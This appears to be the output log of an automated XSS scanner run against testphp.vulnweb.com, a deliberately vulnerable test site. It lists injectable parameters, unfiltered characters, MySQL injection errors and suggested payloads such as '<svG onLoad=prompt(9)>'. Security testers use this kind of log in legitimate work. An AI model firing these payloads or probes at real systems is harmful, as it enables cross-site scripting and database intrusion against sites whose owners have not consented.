[!] Mogelijke XSS-kwetsbaarheden op vulnweb.com:
---
[i] URL: http://testphp.vulnweb.com/login.php
[i] Response URL: http://testphp.vulnweb.com/search.php?test=query
[i] POST URL: http://testphp.vulnweb.com/search.php?test=query
[+] Ongefilterde tekens: '"(){}<x>:/;
[+] Payload: 1zqjgc'"(){}<x>:/1zqjgc;9
[+] Type: form
[+] Injectiepunten: searchFor
[+] Mogelijke payloads: <svG onLoad=prompt(9)>
[i] Line: <h2 id='pagename'>searched for: 1zqjgc'"(){}<x>:/1zqjgc;9

[i] URL: http://testphp.vulnweb.com/login.php
[i] Response URL: http://testphp.vulnweb.com/userinfo.php
[i] POST URL: http://testphp.vulnweb.com/userinfo.php
[+] Ongefilterde tekens: N/A
[+] Payload: 1zqjgc'"(){}<x>:/1zqjgc;9
[+] Type: form
[+] Injectiepunten: pass
[i] Line: Possible SQL injection error! Suspected DBMS: MySQL, regex used: Warning.*mysql_.*

[i] URL: http://testphp.vulnweb.com/guestbook.php
[i] Response URL: http://testphp.vulnweb.com/guestbook.php
[i] POST URL: http://testphp.vulnweb.com/guestbook.php
[+] Ongefilterde tekens: '"(){}<x>:/;
[+] Payload: 1zqjap'"(){}<x>:/1zqjap;9
[+] Type: form
[+] Injectiepunten: text
[+] Mogelijke payloads: <svG onLoad=prompt(9)>
[i] Line: <img src="/images/remark.gif">&nbsp;&nbsp;1zqjap'"(){}<x>:/1zqjap;9

[i] URL: http://testphp.vulnweb.com/guestbook.php
[i] Response URL: http://testphp.vulnweb.com/guestbook.php
[i] POST URL: http://testphp.vulnweb.com/guestbook.php
[+] Ongefilterde tekens: '"(){}<x>:/;
[+] Payload: 1zqjap'"(){}<x>:/1zqjap;9
[+] Type: form
[+] Injectiepunten: name
[+] Mogelijke payloads: <svG onLoad=prompt(9)>
[i] Line: <strong>1zqjap'"(){}<x>:/1zqjap;9

[i] URL: http://testphp.vulnweb.com/hpp/?pp=12
[i] Response URL: http://testphp.vulnweb.com/hpp/?pp=1zqjom'%22()%7B%7D%3Cx%3E:/1zqjom;9
[+] Ongefilterde tekens: '"(){}<x>:/;
[+] Payload: 1zqjom'"(){}<x>:/1zqjom;9
[+] Type: url
[+] Injectiepunten: pp
[+] Mogelijke payloads: x"><svG onLoad=prompt(9)>, x" onmouseover=prompt(9) ", x"/onmouseover=prompt(9)/"
[i] Line: <a href="params.php?p=valid&pp=1zqjom'"(){}<x>:/1zqjom;9

[i] URL: http://testphp.vulnweb.com/hpp/params.php?p=valid&pp=12
[i] Response URL: http://testphp.vulnweb.com/hpp/params.php?p=valid&pp=1zqjev'%22()%7B%7D%3Cx%3E:/1zqjev;9
[+] Ongefilterde tekens: '"(){}<x>:/;
[+] Payload: 1zqjev'"(){}<x>:/1zqjev;9
[+] Type: url
[+] Injectiepunten: pp
[+] Mogelijke payloads: <svG onLoad=prompt(9)>
[i] Line: <pvalid1zqjev'"(){}<x>:/1zqjev;9

[i] URL: http://testphp.vulnweb.com/hpp/params.php?p=valid&pp=12
[i] Response URL: http://testphp.vulnweb.com/hpp/params.php?p=1zqjze'%22()%7B%7D%3Cx%3E:/1zqjze;9&pp=12
[+] Ongefilterde tekens: '"(){}<x>:/;
[+] Payload: 1zqjze'"(){}<x>:/1zqjze;9
[+] Type: url
[+] Injectiepunten: p
[+] Mogelijke payloads: <svG onLoad=prompt(9)>
[i] Line: <p1zqjze'"(){}<x>:/1zqjze;9

[i] URL: http://testphp.vulnweb.com/artists.php?artist=3
[i] Response URL: http://testphp.vulnweb.com/artists.php?artist=1zqjhl'%22()%7B%7D%3Cx%3E:/1zqjhl;9
[+] Ongefilterde tekens: N/A
[+] Payload: 1zqjhl'"(){}<x>:/1zqjhl;9
[+] Type: url
[+] Injectiepunten: artist
[i] Line: Possible SQL injection error! Suspected DBMS: MySQL, regex used: Warning.*mysql_.*

[i] URL: http://testphp.vulnweb.com/artists.php?artist=1
[i] Response URL: http://testphp.vulnweb.com/artists.php?artist=1zqjaz'%22()%7B%7D%3Cx%3E:/1zqjaz;9
[+] Ongefilterde tekens: N/A
[+] Payload: 1zqjaz'"(){}<x>:/1zqjaz;9
[+] Type: url
[+] Injectiepunten: artist
[i] Line: Possible SQL injection error! Suspected DBMS: MySQL, regex used: Warning.*mysql_.*

[i] URL: http://testphp.vulnweb.com/artists.php?artist=2
[i] Response URL: http://testphp.vulnweb.com/artists.php?artist=1zqjsg'%22()%7B%7D%3Cx%3E:/1zqjsg;9
[+] Ongefilterde tekens: N/A
[+] Payload: 1zqjsg'"(){}<x>:/1zqjsg;9
[+] Type: url
[+] Injectiepunten: artist
[i] Line: Possible SQL injection error! Suspected DBMS: MySQL, regex used: Warning.*mysql_.*

[i] URL: http://testphp.vulnweb.com/listproducts.php?cat=1
[i] Response URL: http://testphp.vulnweb.com/listproducts.php?cat=1zqjmg'%22()%7B%7D%3Cx%3E:/1zqjmg;9
[+] Ongefilterde tekens: N/A
[+] Payload: 1zqjmg'"(){}<x>:/1zqjmg;9
[+] Type: url
[+] Injectiepunten: cat
[i] Line: Possible SQL injection error! Suspected DBMS: MySQL, regex used: SQL syntax.*MySQL

[i] URL: http://testphp.vulnweb.com/listproducts.php?cat=1
[i] Response URL: http://testphp.vulnweb.com/listproducts.php?cat=1zqjmg'%22()%7B%7D%3Cx%3E:/1zqjmg;9
[+] Ongefilterde tekens: '"(){}<x>:/
[+] Payload: 1zqjmg'"(){}<x>:/1zqjmg;9
[+] Type: url
[+] Injectiepunten: cat
[i] Line: 	error: you have an error in your sql syntax; check the manual that corresponds to your mysql server version for the right syntax to use near ''"(){}<x>:/1zqjmg;9' at line 1
[!] Fout: Payload delims do not surround this injection point. Found via search for entire payload.

[i] URL: http://testphp.vulnweb.com/listproducts.php?artist=3
[i] Response URL: http://testphp.vulnweb.com/listproducts.php?artist=1zqjym'%22()%7B%7D%3Cx%3E:/1zqjym;9
[+] Ongefilterde tekens: N/A
[+] Payload: 1zqjym'"(){}<x>:/1zqjym;9
[+] Type: url
[+] Injectiepunten: artist
[i] Line: Possible SQL injection error! Suspected DBMS: MySQL, regex used: SQL syntax.*MySQL

[i] URL: http://testphp.vulnweb.com/listproducts.php?artist=3
[i] Response URL: http://testphp.vulnweb.com/listproducts.php?artist=1zqjym'%22()%7B%7D%3Cx%3E:/1zqjym;9
[+] Ongefilterde tekens: '"(){}<x>:/
[+] Payload: 1zqjym'"(){}<x>:/1zqjym;9
[+] Type: url
[+] Injectiepunten: artist
[i] Line: 	error: you have an error in your sql syntax; check the manual that corresponds to your mysql server version for the right syntax to use near ''"(){}<x>:/1zqjym;9' at line 1
[!] Fout: Payload delims do not surround this injection point. Found via search for entire payload.

[i] URL: http://testphp.vulnweb.com/listproducts.php?artist=2
[i] Response URL: http://testphp.vulnweb.com/listproducts.php?artist=1zqjuz'%22()%7B%7D%3Cx%3E:/1zqjuz;9
[+] Ongefilterde tekens: N/A
[+] Payload: 1zqjuz'"(){}<x>:/1zqjuz;9
[+] Type: url
[+] Injectiepunten: artist
[i] Line: Possible SQL injection error! Suspected DBMS: MySQL, regex used: SQL syntax.*MySQL

[i] URL: http://testphp.vulnweb.com/listproducts.php?artist=2
[i] Response URL: http://testphp.vulnweb.com/listproducts.php?artist=1zqjuz'%22()%7B%7D%3Cx%3E:/1zqjuz;9
[+] Ongefilterde tekens: '"(){}<x>:/
[+] Payload: 1zqjuz'"(){}<x>:/1zqjuz;9
[+] Type: url
[+] Injectiepunten: artist
[i] Line: 	error: you have an error in your sql syntax; check the manual that corresponds to your mysql server version for the right syntax to use near ''"(){}<x>:/1zqjuz;9' at line 1
[!] Fout: Payload delims do not surround this injection point. Found via search for entire payload.

[i] URL: http://testphp.vulnweb.com/listproducts.php?artist=1
[i] Response URL: http://testphp.vulnweb.com/listproducts.php?artist=1zqjnc'%22()%7B%7D%3Cx%3E:/1zqjnc;9
[+] Ongefilterde tekens: N/A
[+] Payload: 1zqjnc'"(){}<x>:/1zqjnc;9
[+] Type: url
[+] Injectiepunten: artist
[i] Line: Possible SQL injection error! Suspected DBMS: MySQL, regex used: SQL syntax.*MySQL

[i] URL: http://testphp.vulnweb.com/listproducts.php?artist=1
[i] Response URL: http://testphp.vulnweb.com/listproducts.php?artist=1zqjnc'%22()%7B%7D%3Cx%3E:/1zqjnc;9
[+] Ongefilterde tekens: '"(){}<x>:/
[+] Payload: 1zqjnc'"(){}<x>:/1zqjnc;9
[+] Type: url
[+] Injectiepunten: artist
[i] Line: 	error: you have an error in your sql syntax; check the manual that corresponds to your mysql server version for the right syntax to use near ''"(){}<x>:/1zqjnc;9' at line 1
[!] Fout: Payload delims do not surround this injection point. Found via search for entire payload.

[i] URL: http://testphp.vulnweb.com/listproducts.php?cat=2
[i] Response URL: http://testphp.vulnweb.com/listproducts.php?cat=1zqjum'%22()%7B%7D%3Cx%3E:/1zqjum;9
[+] Ongefilterde tekens: N/A
[+] Payload: 1zqjum'"(){}<x>:/1zqjum;9
[+] Type: url
[+] Injectiepunten: cat
[i] Line: Possible SQL injection error! Suspected DBMS: MySQL, regex used: SQL syntax.*MySQL

[i] URL: http://testphp.vulnweb.com/listproducts.php?cat=2
[i] Response URL: http://testphp.vulnweb.com/listproducts.php?cat=1zqjum'%22()%7B%7D%3Cx%3E:/1zqjum;9
[+] Ongefilterde tekens: '"(){}<x>:/
[+] Payload: 1zqjum'"(){}<x>:/1zqjum;9
[+] Type: url
[+] Injectiepunten: cat
[i] Line: 	error: you have an error in your sql syntax; check the manual that corresponds to your mysql server version for the right syntax to use near ''"(){}<x>:/1zqjum;9' at line 1
[!] Fout: Payload delims do not surround this injection point. Found via search for entire payload.

[i] URL: http://testphp.vulnweb.com/product.php?pic=5
[i] Response URL: http://testphp.vulnweb.com/product.php?pic=1zqjbd'%22()%7B%7D%3Cx%3E:/1zqjbd;9
[+] Ongefilterde tekens: N/A
[+] Payload: 1zqjbd'"(){}<x>:/1zqjbd;9
[+] Type: url
[+] Injectiepunten: pic
[i] Line: Possible SQL injection error! Suspected DBMS: MySQL, regex used: Warning.*mysql_.*

[i] URL: http://testphp.vulnweb.com/showimage.php?file=./pictures/7.jpg
[i] Response URL: http://testphp.vulnweb.com/showimage.php?file=1zqjty'%22()%7B%7D%3Cx%3E:/1zqjty;9
[+] Ongefilterde tekens: '"(){}<x>:/;
[+] Payload: 1zqjty'"(){}<x>:/1zqjty;9
[+] Type: url
[+] Injectiepunten: file
[+] Mogelijke payloads: <svG onLoad=prompt(9)>
[i] Line: <p
warning: fopen(1zqjty'"(){}<x>:/1zqjty;9

[i] URL: http://testphp.vulnweb.com/product.php?pic=2
[i] Response URL: http://testphp.vulnweb.com/product.php?pic=1zqjma'%22()%7B%7D%3Cx%3E:/1zqjma;9
[+] Ongefilterde tekens: N/A
[+] Payload: 1zqjma'"(){}<x>:/1zqjma;9
[+] Type: url
[+] Injectiepunten: pic
[i] Line: Possible SQL injection error! Suspected DBMS: MySQL, regex used: Warning.*mysql_.*

[i] URL: http://testphp.vulnweb.com/showimage.php?file=./pictures/4.jpg
[i] Response URL: http://testphp.vulnweb.com/showimage.php?file=1zqjro'%22()%7B%7D%3Cx%3E:/1zqjro;9
[+] Ongefilterde tekens: '"(){}<x>:/;
[+] Payload: 1zqjro'"(){}<x>:/1zqjro;9
[+] Type: url
[+] Injectiepunten: file
[+] Mogelijke payloads: <svG onLoad=prompt(9)>
[i] Line: <p
warning: fopen(1zqjro'"(){}<x>:/1zqjro;9

[i] URL: http://testphp.vulnweb.com/product.php?pic=1
[i] Response URL: http://testphp.vulnweb.com/product.php?pic=1zqjuv'%22()%7B%7D%3Cx%3E:/1zqjuv;9
[+] Ongefilterde tekens: N/A
[+] Payload: 1zqjuv'"(){}<x>:/1zqjuv;9
[+] Type: url
[+] Injectiepunten: pic
[i] Line: Possible SQL injection error! Suspected DBMS: MySQL, regex used: Warning.*mysql_.*

[i] URL: http://testphp.vulnweb.com/showimage.php?file=./pictures/1.jpg
[i] Response URL: http://testphp.vulnweb.com/showimage.php?file=1zqjqd'%22()%7B%7D%3Cx%3E:/1zqjqd;9
[+] Ongefilterde tekens: '"(){}<x>:/;
[+] Payload: 1zqjqd'"(){}<x>:/1zqjqd;9
[+] Type: url
[+] Injectiepunten: file
[+] Mogelijke payloads: <svG onLoad=prompt(9)>
[i] Line: <p
warning: fopen(1zqjqd'"(){}<x>:/1zqjqd;9

[i] URL: http://testphp.vulnweb.com/showimage.php?file=./pictures/5.jpg
[i] Response URL: http://testphp.vulnweb.com/showimage.php?file=1zqjdz'%22()%7B%7D%3Cx%3E:/1zqjdz;9
[+] Ongefilterde tekens: '"(){}<x>:/;
[+] Payload: 1zqjdz'"(){}<x>:/1zqjdz;9
[+] Type: url
[+] Injectiepunten: file
[+] Mogelijke payloads: <svG onLoad=prompt(9)>
[i] Line: <p
warning: fopen(1zqjdz'"(){}<x>:/1zqjdz;9

[i] URL: http://testphp.vulnweb.com/showimage.php?file=./pictures/2.jpg
[i] Response URL: http://testphp.vulnweb.com/showimage.php?file=1zqjsd'%22()%7B%7D%3Cx%3E:/1zqjsd;9
[+] Ongefilterde tekens: '"(){}<x>:/;
[+] Payload: 1zqjsd'"(){}<x>:/1zqjsd;9
[+] Type: url
[+] Injectiepunten: file
[+] Mogelijke payloads: <svG onLoad=prompt(9)>
[i] Line: <p
warning: fopen(1zqjsd'"(){}<x>:/1zqjsd;9

[i] URL: http://testphp.vulnweb.com/product.php?pic=6
[i] Response URL: http://testphp.vulnweb.com/product.php?pic=1zqjlx'%22()%7B%7D%3Cx%3E:/1zqjlx;9
[+] Ongefilterde tekens: N/A
[+] Payload: 1zqjlx'"(){}<x>:/1zqjlx;9
[+] Type: url
[+] Injectiepunten: pic
[i] Line: Possible SQL injection error! Suspected DBMS: MySQL, regex used: Warning.*mysql_.*

[i] URL: http://testphp.vulnweb.com/showimage.php?file=./pictures/6.jpg
[i] Response URL: http://testphp.vulnweb.com/showimage.php?file=1zqjka'%22()%7B%7D%3Cx%3E:/1zqjka;9
[+] Ongefilterde tekens: '"(){}<x>:/;
[+] Payload: 1zqjka'"(){}<x>:/1zqjka;9
[+] Type: url
[+] Injectiepunten: file
[+] Mogelijke payloads: <svG onLoad=prompt(9)>
[i] Line: <p
warning: fopen(1zqjka'"(){}<x>:/1zqjka;9

[i] URL: http://testphp.vulnweb.com/product.php?pic=3
[i] Response URL: http://testphp.vulnweb.com/product.php?pic=1zqjfr'%22()%7B%7D%3Cx%3E:/1zqjfr;9
[+] Ongefilterde tekens: N/A
[+] Payload: 1zqjfr'"(){}<x>:/1zqjfr;9
[+] Type: url
[+] Injectiepunten: pic
[i] Line: Possible SQL injection error! Suspected DBMS: MySQL, regex used: Warning.*mysql_.*

[i] URL: http://testphp.vulnweb.com/product.php?pic=4
[i] Response URL: http://testphp.vulnweb.com/product.php?pic=1zqjjq'%22()%7B%7D%3Cx%3E:/1zqjjq;9
[+] Ongefilterde tekens: N/A
[+] Payload: 1zqjjq'"(){}<x>:/1zqjjq;9
[+] Type: url
[+] Injectiepunten: pic
[i] Line: Possible SQL injection error! Suspected DBMS: MySQL, regex used: Warning.*mysql_.*

[i] URL: http://testphp.vulnweb.com/showimage.php?file=./pictures/3.jpg
[i] Response URL: http://testphp.vulnweb.com/showimage.php?file=1zqjab'%22()%7B%7D%3Cx%3E:/1zqjab;9
[+] Ongefilterde tekens: '"(){}<x>:/;
[+] Payload: 1zqjab'"(){}<x>:/1zqjab;9
[+] Type: url
[+] Injectiepunten: file
[+] Mogelijke payloads: <svG onLoad=prompt(9)>
[i] Line: <p
warning: fopen(1zqjab'"(){}<x>:/1zqjab;9

[i] URL: http://testphp.vulnweb.com/product.php?pic=7
[i] Response URL: http://testphp.vulnweb.com/product.php?pic=1zqjym'%22()%7B%7D%3Cx%3E:/1zqjym;9
[+] Ongefilterde tekens: N/A
[+] Payload: 1zqjym'"(){}<x>:/1zqjym;9
[+] Type: url
[+] Injectiepunten: pic
[i] Line: Possible SQL injection error! Suspected DBMS: MySQL, regex used: Warning.*mysql_.*

[i] URL: http://testphp.vulnweb.com/listproducts.php?cat=4
[i] Response URL: http://testphp.vulnweb.com/listproducts.php?cat=1zqjdx'%22()%7B%7D%3Cx%3E:/1zqjdx;9
[+] Ongefilterde tekens: N/A
[+] Payload: 1zqjdx'"(){}<x>:/1zqjdx;9
[+] Type: url
[+] Injectiepunten: cat
[i] Line: Possible SQL injection error! Suspected DBMS: MySQL, regex used: SQL syntax.*MySQL

[i] URL: http://testphp.vulnweb.com/listproducts.php?cat=4
[i] Response URL: http://testphp.vulnweb.com/listproducts.php?cat=1zqjdx'%22()%7B%7D%3Cx%3E:/1zqjdx;9
[+] Ongefilterde tekens: '"(){}<x>:/
[+] Payload: 1zqjdx'"(){}<x>:/1zqjdx;9
[+] Type: url
[+] Injectiepunten: cat
[i] Line: 	error: you have an error in your sql syntax; check the manual that corresponds to your mysql server version for the right syntax to use near ''"(){}<x>:/1zqjdx;9' at line 1
[!] Fout: Payload delims do not surround this injection point. Found via search for entire payload.

[i] URL: http://testphp.vulnweb.com/listproducts.php?cat=3
[i] Response URL: http://testphp.vulnweb.com/listproducts.php?cat=1zqjgk'%22()%7B%7D%3Cx%3E:/1zqjgk;9
[+] Ongefilterde tekens: N/A
[+] Payload: 1zqjgk'"(){}<x>:/1zqjgk;9
[+] Type: url
[+] Injectiepunten: cat
[i] Line: Possible SQL injection error! Suspected DBMS: MySQL, regex used: SQL syntax.*MySQL

[i] URL: http://testphp.vulnweb.com/listproducts.php?cat=3
[i] Response URL: http://testphp.vulnweb.com/listproducts.php?cat=1zqjgk'%22()%7B%7D%3Cx%3E:/1zqjgk;9
[+] Ongefilterde tekens: '"(){}<x>:/
[+] Payload: 1zqjgk'"(){}<x>:/1zqjgk;9
[+] Type: url
[+] Injectiepunten: cat
[i] Line: 	error: you have an error in your sql syntax; check the manual that corresponds to your mysql server version for the right syntax to use near ''"(){}<x>:/1zqjgk;9' at line 1
[!] Fout: Payload delims do not surround this injection point. Found via search for entire payload.
